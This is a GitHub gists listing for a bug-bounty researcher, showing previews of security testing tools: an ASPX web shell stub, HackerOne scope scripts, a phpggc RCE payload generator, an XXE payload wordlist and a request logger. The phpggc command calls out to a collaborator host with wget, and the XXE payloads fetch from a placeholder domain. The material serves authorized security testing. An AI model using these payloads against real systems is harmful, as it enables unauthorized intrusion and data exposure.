I hereby claim:
- I am honoki on github.
- I am honoki (https://keybase.io/honoki) on keybase.
- I have a public key ASAeJaTSXX2WEDxNZf5QSkh-Rg_hl16ncJgcuW14Aba7Two
To claim this, I am signing this object:
honoki
/ keybase.md
Created
December 2, 2021 13:31
honoki
/ harmless-shell.aspx
Last active
July 20, 2021 15:25
A harmless ASPX shell to demonstrate the impact of arbitrary file upload.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="VB" Debug="true" %> | |
| <%@ import Namespace="system.IO" %> | |
| <%@ import Namespace="System.Diagnostics" %> | |
| <!-- sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx --> | |
| <% | |
| Response.Write("Executing code.") |
honoki
/ hackerone-update-program-scopes.sh
Last active
August 8, 2023 10:48
Update the scope of your HackerOne programs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Update the scope of your HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| for p in $(bbrf programs where platform is hackerone --show-empty-scope); do | |
| h1id=$(bbrf show $p | jq -r .tags.h1id) |
honoki
/ hackerone-initiate-programs.sh
Last active
September 18, 2023 18:56
Create new BBRF programs from your private and public HackerOne programs.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Initiate new BBRF programs from your public and private HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| while [ "$next" ]; do |
honoki
/ phpggc-generate-payloads.sh
Last active
February 5, 2023 21:52
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" | |
| # generate gadget chains |
honoki
/ xxe-payloads.txt
Last active
March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
honoki
/ mitmdump-logger.py
Created
July 14, 2020 19:06
mitmdump script to dump incoming HTTP requests to Slack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import requests | |
| def is_blacklisted(domain): | |
| blacklist = open("/path/to/blacklist.txt") | |
| return domain in [w.strip() for w in blacklist.readlines()] | |
| def request(flow): | |
| req = flow.request.method + ' ' + flow.request.path + ' ' + flow.request.http_version + '\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import requests | |
| def is_blacklisted(domain): | |
| blacklist = open("blacklist.txt") | |
| return domain in [w.strip() for w in blacklist.readlines()] | |
| # Avoid Slack expanding your links by replacing the last dot. | |
| def escape_domain(domain): | |
| return domain.replace('yourdomain.com', 'yourdomain[.]com') |